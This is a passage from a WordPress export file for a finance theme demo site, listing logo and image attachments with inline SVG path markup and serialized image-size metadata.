	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>04_Black</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_header_builders/header-4/04_black/</link>
		<pubDate>Thu, 03 Sep 2020 10:33:41 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/04_Black.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>383</wp:post_id>
		<wp:post_date><![CDATA[2020-09-03 10:33:41]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-03 10:33:41]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[04_black]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>217</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/04_Black.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/04_Black.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#1B1D21;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="2.012780e-07" style="stop-color:#C0FFBF"></stop>
	<stop offset="1" style="stop-color:#55BB53"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>01_White</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/ot_footer_builders/footer-1/01_white/</link>
		<pubDate>Fri, 04 Sep 2020 03:40:21 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/01_White.svg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>404</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 03:40:21]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 03:40:21]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[01_white]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>300</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/01_White.svg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/07/01_White.svg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_inline_svg]]></wp:meta_key>
		<wp:meta_value><![CDATA[<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_3" x="0px" y="0px" viewBox="0 0 135.4 25" style="enable-background:new 0 0 135.4 25;" xml:space="preserve">
<style type="text/css">
	.st0{fill:url(#SVGID_1_);}
	.st1{fill:#FFFFFF;}
</style>
<linearGradient id="SVGID_1_" gradientUnits="userSpaceOnUse" x1="-9.094947e-13" y1="12.5" x2="40.4028" y2="12.5">
	<stop offset="0" style="stop-color:#FFD797"></stop>
	<stop offset="1" style="stop-color:#FF8523"></stop>
</linearGradient>
<path class="st0" d="M40.4,20.3c0-0.6,0-1.1-0.1-1.6c-0.1-2-0.2-3.3-0.2-3.3V4.2c0-0.8-0.3-1.6-0.7-2.3c0,0,0,0.1,0,0.1  s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.5c-0.2-0.2-0.4-0.4-0.7-0.6c-0.3-0.2-0.6-0.4-1.1-0.5C36.9,0.1,36.4,0,35.9,0  c-0.5,0-1.1,0.1-1.6,0.4c-0.3,0.1-0.5,0.3-0.7,0.4c-0.1,0.1-0.3,0.2-0.3,0.3l-0.2,0.1l-0.1,0.1c-0.4,0.4-0.8,0.8-1.2,1.2  c-0.4,0.4-0.8,0.8-1.2,1.2c-0.4,0.4-0.8,0.8-1.1,1.2c-0.7,0.8-1.4,1.5-1.9,2.1C26.4,8.2,25.7,9,25.7,9l0,0l-2,2V7.7V4.4  c0-0.6-0.1-1.2-0.4-1.7c0,0,0,0,0,0s0-0.1-0.1-0.2c-0.1-0.1-0.2-0.3-0.3-0.6C22.6,1.4,22,0.7,21,0.4c-0.5-0.2-1-0.3-1.6-0.2  c-0.6,0-1.2,0.2-1.8,0.5c-0.1,0.1-0.3,0.2-0.4,0.3C17,1,16.9,1.1,16.7,1.2c-0.3,0.2-0.5,0.4-0.7,0.7c-0.5,0.5-0.9,0.9-1.4,1.4  c-0.5,0.5-0.9,0.9-1.4,1.4C12.8,5.1,12.4,5.6,12,6c-0.8,0.9-1.6,1.7-2.3,2.4c-1.3,1.4-2.2,2.4-2.2,2.5l-6.4,6.4  c-1.4,1.4-1.5,3.5-0.5,5c0.2,0.4,0.5,0.7,0.8,1c0.3,0.3,0.7,0.5,1.1,0.7c0.4,0.2,0.8,0.3,1.2,0.3c0.4,0,0.9,0,1.3-0.1  c0.4-0.1,0.8-0.2,1.2-0.5c0.4-0.2,0.7-0.5,1-0.8c0.6-0.6,1.2-1.1,1.8-1.7c0.6-0.6,1.2-1.2,1.7-1.7l1.7-1.8c1-1.1,2-2.1,3.1-3.2  c0,0.5,0,1,0.1,1.5c0,0.7,0.1,1.3,0.1,2V19c-0.1,0.3-0.3,0.7-0.3,1c-0.1,0.8,0,1.6,0.3,2.4c0.2,0.4,0.4,0.7,0.7,1l0.2,0.2  c0.1,0.1,0.2,0.1,0.2,0.2c0.2,0.1,0.3,0.3,0.5,0.4c0.7,0.4,1.5,0.7,2.2,0.7c0.8,0,1.5-0.2,2.1-0.5c0.3-0.2,0.6-0.4,0.8-0.6  c0.2-0.2,0.4-0.4,0.6-0.6c0.8-0.8,1.4-1.5,1.8-2c0.4-0.5,0.7-0.8,0.7-0.8l6.6-6.6v3.4c0,0-0.1,1.3-0.2,3.3c0,0.5,0,1.1,0.2,1.7  c0.2,0.6,0.6,1.1,1,1.6c0.5,0.5,1.1,0.8,1.8,1c0.2,0.1,0.3,0.1,0.5,0.1c0.2,0,0.3,0,0.5,0c0.2,0,0.4,0,0.5,0c0.2,0,0.4,0,0.5-0.1  c0.7-0.2,1.4-0.5,1.9-1c0.5-0.5,0.9-1.1,1.1-1.7c0.1-0.2,0.1-0.3,0.1-0.5c0-0.2,0.1-0.3,0.1-0.5c0-0.2,0-0.3,0-0.5  C40.4,20.6,40.4,20.5,40.4,20.3z"></path>
<g>
	<path class="st1" d="M52,5.5c0.2,0,0.4,0,0.6,0.1C52.8,5.7,52.9,5.9,53,6l4.9,7.5l-1,0l5-7.4c0.3-0.4,0.6-0.5,1-0.5   c0.3,0,0.6,0.1,0.9,0.3C64,6,64.1,6.3,64.1,6.7v11.6c0,0.3-0.1,0.6-0.3,0.9s-0.5,0.3-0.9,0.3s-0.7-0.1-0.9-0.3   c-0.2-0.2-0.4-0.5-0.4-0.9V8.9L62.4,9l-4.1,6.2c-0.1,0.1-0.3,0.3-0.5,0.4c-0.2,0.1-0.4,0.2-0.5,0.1c-0.2,0-0.3,0-0.5-0.1   c-0.2-0.1-0.3-0.2-0.5-0.4l-3.8-6L53,8.2v10.1c0,0.3-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3c-0.3,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.5-0.3-0.9V6.7c0-0.3,0.1-0.6,0.4-0.9C51.3,5.6,51.6,5.5,52,5.5z"></path>
	<path class="st1" d="M72.2,8.6l-4.3,10.2c-0.1,0.3-0.2,0.5-0.4,0.6c-0.2,0.1-0.4,0.2-0.6,0.2c-0.4,0-0.6-0.1-0.8-0.3   c-0.2-0.2-0.3-0.4-0.3-0.7c0-0.1,0-0.2,0.1-0.4l5-12c0.1-0.3,0.3-0.5,0.5-0.6c0.2-0.1,0.5-0.2,0.7-0.2c0.2,0,0.5,0.1,0.7,0.2   c0.2,0.1,0.4,0.3,0.4,0.6l4.9,11.7c0.1,0.2,0.1,0.3,0.1,0.5c0,0.4-0.1,0.6-0.3,0.9c-0.2,0.2-0.5,0.3-0.8,0.3   c-0.2,0-0.5-0.1-0.7-0.2S76.1,19,76,18.8l-4.3-10L72.2,8.6z M68.5,16.4l1.1-2.3H75l0.4,2.3H68.5z"></path>
	<path class="st1" d="M80.4,19.6c-0.3,0-0.5-0.1-0.8-0.3c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.3-0.8l4.1-5.5l1.3,1.9L81.4,19   C81.1,19.4,80.8,19.6,80.4,19.6z M80.5,5.4c0.4,0,0.7,0.2,1,0.5l8.8,11.7c0.2,0.2,0.2,0.5,0.2,0.7c0,0.4-0.1,0.7-0.4,0.9   c-0.3,0.2-0.5,0.3-0.8,0.3c-0.4,0-0.7-0.2-1-0.5L79.6,7.4c-0.2-0.2-0.3-0.5-0.3-0.7c0-0.3,0.1-0.6,0.4-0.9S80.3,5.4,80.5,5.4z    M89.5,5.5c0.3,0,0.6,0.1,0.8,0.4c0.2,0.2,0.3,0.5,0.3,0.8c0,0.3-0.1,0.5-0.3,0.7l-4,5.3l-1.4-1.9l3.5-4.7   C88.8,5.7,89.1,5.5,89.5,5.5z"></path>
	<path class="st1" d="M99.2,5.5c1.3,0,2.2,0.3,2.9,0.9c0.6,0.6,0.9,1.5,0.9,2.7c0,0.6-0.2,1.2-0.5,1.6c-0.3,0.5-0.8,0.8-1.4,1.1   c-0.6,0.3-1.3,0.4-2.2,0.4l0.1-0.9c0.4,0,0.9,0.1,1.4,0.2s1.1,0.3,1.6,0.6c0.5,0.3,0.9,0.7,1.2,1.2c0.3,0.5,0.5,1.2,0.5,2   c0,0.9-0.1,1.6-0.4,2.2c-0.3,0.6-0.7,1-1.1,1.3s-1,0.5-1.5,0.6s-1,0.2-1.5,0.2h-5c-0.3,0-0.6-0.1-0.9-0.3S93,18.6,93,18.3V6.7   c0-0.3,0.1-0.6,0.3-0.9s0.5-0.4,0.9-0.4H99.2z M98.9,7.9h-3.6l0.3-0.3v3.6L95.3,11h3.6c0.4,0,0.7-0.1,1-0.4s0.5-0.6,0.5-1.1   c0-0.6-0.1-1-0.4-1.3C99.7,8,99.4,7.9,98.9,7.9z M99,13.3h-3.6l0.2-0.2v4.2l-0.2-0.2h3.8c0.6,0,1.1-0.2,1.5-0.5   c0.4-0.3,0.5-0.8,0.5-1.5c0-0.6-0.1-1-0.4-1.3s-0.5-0.4-0.9-0.5C99.6,13.4,99.3,13.3,99,13.3z"></path>
	<path class="st1" d="M108.6,18.3c0,0.3-0.1,0.6-0.4,0.9c-0.3,0.2-0.5,0.3-0.9,0.3c-0.4,0-0.7-0.1-0.9-0.3s-0.3-0.5-0.3-0.9V6.7   c0-0.3,0.1-0.6,0.4-0.9c0.2-0.2,0.5-0.4,0.9-0.4c0.3,0,0.6,0.1,0.8,0.4s0.4,0.5,0.4,0.9V18.3z"></path>
	<path class="st1" d="M121,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3h-8.8c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H121z"></path>
	<path class="st1" d="M134,5.5c0.3,0,0.6,0.1,0.9,0.3c0.3,0.2,0.4,0.5,0.4,0.9c0,0.3-0.1,0.5-0.3,0.8l-7.7,9.8l-0.2-0.1h6.7   c0.3,0,0.6,0.1,0.9,0.3c0.2,0.2,0.4,0.5,0.4,0.8c0,0.3-0.1,0.6-0.4,0.8s-0.5,0.3-0.9,0.3H125c-0.3,0-0.6-0.1-0.9-0.4   c-0.3-0.2-0.4-0.5-0.4-0.8c0-0.3,0.1-0.5,0.3-0.8l7.7-9.9l0.2,0.1h-6.1c-0.3,0-0.6-0.1-0.9-0.3c-0.2-0.2-0.4-0.5-0.4-0.8   s0.1-0.6,0.4-0.8c0.2-0.2,0.5-0.3,0.9-0.3H134z"></path>
</g>
</svg>]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>post</title>
		<link>http://wpdemo.archiwp.com/maxbizz-finance/entering-the-next-phase-of-digital-transformation/post/</link>
		<pubDate>Fri, 04 Sep 2020 07:21:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">https://maxbizz.s3.amazonaws.com/images/post.jpg</guid>
		<description></description>
		<content:encoded><![CDATA[]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>417</wp:post_id>
		<wp:post_date><![CDATA[2020-09-04 07:21:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-04 07:21:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[post]]></wp:post_name>
		<wp:status><![CDATA[inherit]]></wp:status>
		<wp:post_parent>413</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[attachment]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
						<wp:attachment_url><![CDATA[https://maxbizz.s3.amazonaws.com/images/post.jpg]]></wp:attachment_url>
											<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attached_file]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020/09/post.jpg]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_attachment_metadata]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:5:{s:5:"width";i:870;s:6:"height";i:350;s:4:"file";s:18:"2020/09/post.jpg";s:5:"sizes";a:5:{s:6:"medium";a:4:{s:4:"file";s:18:"post-1-300x121.jpg";s:5:"width";i:300;s:6:"height";i:121;s:9:"mime-type";s:10:"image/jpeg";}s:9:"thumbnail";a:4:{s:4:"file";s:18:"post-1-150x150.jpg";s:5:"width";i:150;s:6:"height";i:150;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"post-1-768x309.jpg";s:5:"width";i:768;s:6:"height";i:309;s:9:"mime-type";s:10:"image/jpeg";}s:27:"maxbizz-post-thumbnail-grid";a:4:{s:4:"file";s:18:"post-1-600x350.jpg";s:5:"width";i:600;s:6:"height";i:350;s:9:"mime-type";s:10:"image/jpeg";}s:32:"maxbizz-portfolio-thumbnail-grid";a:4:{s:4:"file";s:18:"post-1-600x350.jpg";s:5:"width";i:600;s:6:"height";i:350;s:9:"mime-type";s:10